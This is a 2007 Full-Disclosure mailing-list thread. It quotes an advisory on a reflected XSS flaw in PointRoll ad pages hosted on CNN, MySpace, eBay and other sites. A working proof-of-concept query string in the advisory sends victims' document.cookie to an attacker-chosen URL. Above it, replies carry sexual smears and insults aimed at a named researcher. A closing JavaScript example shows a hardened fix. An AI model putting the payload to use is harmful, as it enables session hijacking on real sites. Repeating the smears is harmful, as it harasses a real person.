i hurd pdp likes animal porn, is this true? pdp can you give us a detailed write up of where you find your animal porn? along with xss 0dayz in every link?<br><br><div><span class="gmail_quote">On 10/19/07, <b class="gmail_sendername">
phioust</b> &lt;<a href="mailto:phioust@gmail.com">phioust@gmail.com</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">In order for this severe vulnerability to get the attention it deserves, it should have first been given to pdp architect so that he could whore it up to the media and do many interviews and PDFs on it.
<br><br><a href="http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open</a><br><a href="http://www.gnucitizen.org/about/pdp#comment-59109" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.gnucitizen.org/about/pdp#comment-59109
</a><br><a href="http://securityreason.com/securityalert/3213" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://securityreason.com/securityalert/3213</a><br><a href="http://www.hackinthebox.org/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=22351&amp;mode=thread&amp;order=0&amp;thold=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.hackinthebox.org/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=22351&amp;mode=thread&amp;order=0&amp;thold=0
</a><br><br>pdp architect could have also given great technical insight into the vulnerability due to his years spent researching XSS.<br><br><a href="http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html</a> &lt;- a very technical email by pdp<br><br><font size="-1">Results <b>1</b> - <b>10</b> of about <b>59,000</b> for <b>pdp <span style="text-decoration: underline;">

architect</span> xss</b>.  (<b>0.12</b> seconds) <br><br>^ a great way to make a security career if stack based overflows are too challenging for you<br><br></font><div><div><span class="e" id="q_115b96db7128bd62_1"><span class="gmail_quote">
On 10/18/07, <b class="gmail_sendername">
jgffgjfgd rewrewrew</b> &lt;<a href="mailto:ctjsme@gmail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">ctjsme@gmail.com</a>&gt; wrote:</span></span></div><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div><span class="e" id="q_115b96db7128bd62_3">

A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll.<br>
<br>
The following list is a subset of the websites which contain the vulnerability:<br>
<a title="http://www.cnn.com/pointroll/PointRollAds.htm" href="http://www.cnn.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.cnn.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.myspace.com/pointroll/PointRollAds.htm" href="http://www.myspace.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.myspace.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.friendster.com/pointroll/PointRollAds.htm" href="http://www.friendster.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.friendster.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://archive.gamespy.com/pointroll/PointRollAds.htm" href="http://archive.gamespy.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://archive.gamespy.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.monster.com/pointroll/PointRollAds.htm" href="http://www.monster.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.monster.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.allmusic.com/pointroll/PointRollAds.htm" href="http://www.allmusic.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.allmusic.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.pcworld.com/pointroll/PointRollAds.htm" href="http://www.pcworld.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.pcworld.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.10best.com/pointroll/PointRollAds.htm" href="http://www.10best.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.10best.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.askmen.com/pointroll/PointRollAds.htm" href="http://www.askmen.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.askmen.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://pages.ebay.com/pointroll/PointRollAds.html" href="http://pages.ebay.com/pointroll/PointRollAds.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://pages.ebay.com/pointroll/PointRollAds.html
</a><br>
<br>
The above pages include a script at <a href="http://pointroll.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">pointroll.com</a> which is the root of
the vulnerability. The vulnerability arises from the use of
location.search without sanitizing the query.<br>
<br>
The following is a proof of concept which works in Firefox. This should
be placed onto the end of any of the above URLs, obviously. [URL]
should be replaced by your website URL, such as <a title="http://www.foo.com/bar.php" href="http://www.foo.com/bar.php" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.foo.com/bar.php</a>, and [LENGTH+1] should be the length of your website URL + 1.
<br>
<br>
?pub=[URL]?&amp;redir=%27%3E%3Cscript%3Ewindow.location=location.search.substring(5,[LENGTH+1]).concat(document.cookie)%3C/script%3E&amp;ad=g235e20051011164320
<br></span></div><span class="q">_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://secunia.com/</a><br>

</span></blockquote></div><br>
</blockquote></div>
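<br><br>The root cause named in the quoted advisory (a value from location.search placed into the page without sanitizing) shown beside a hardened form. This is an added example, not part of the thread and not PointRoll's script; the function names, the allowlisted host ads.example.com and the sample queries are assumptions constructed for illustration.

```javascript
// Added illustration: not PointRoll's script. All names here are hypothetical.
const ALLOWED_REDIRECT_HOSTS = new Set(["ads.example.com"]); // assumed allowlist

// Pattern the advisory describes: a location.search value is decoded and
// concatenated into markup with no validation or escaping.
function renderAdLinkUnsafe(search) {
  const m = /[?&]redir=([^&]*)/.exec(search);
  const redir = m ? decodeURIComponent(m[1]) : "";
  return "<a href='" + redir + "'>ad</a>";
}

// Escape every character that can end an attribute value or open a tag.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: parse the query, require an absolute http(s) URL on an
// allowlisted host, then escape for the attribute context.
function renderAdLinkSafe(search) {
  const redir = new URLSearchParams(search).get("redir") || "";
  let url;
  try {
    url = new URL(redir); // throws on relative or malformed input
  } catch {
    return null;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  if (!ALLOWED_REDIRECT_HOSTS.has(url.hostname)) return null;
  return "<a href='" + escapeAttr(url.href) + "'>ad</a>";
}

// Constructed sample queries (not taken from the thread).
const BREAKOUT = "?pub=x&redir=%27%3E%3Cb%3Einjected%3C/b%3E&ad=1";
const LEGIT = "?redir=https%3A%2F%2Fads.example.com%2Fclick%3Fid%3D1%26c%3D2";

console.log(renderAdLinkUnsafe(BREAKOUT)); // attribute is closed early by the input
console.log(renderAdLinkSafe(BREAKOUT));   // rejected: not an absolute URL
console.log(renderAdLinkSafe(LEGIT));      // accepted and escaped
```

In a browser the same checks apply to window.location.search; assigning the validated URL through an element's href property instead of building markup strings removes the injection sink altogether.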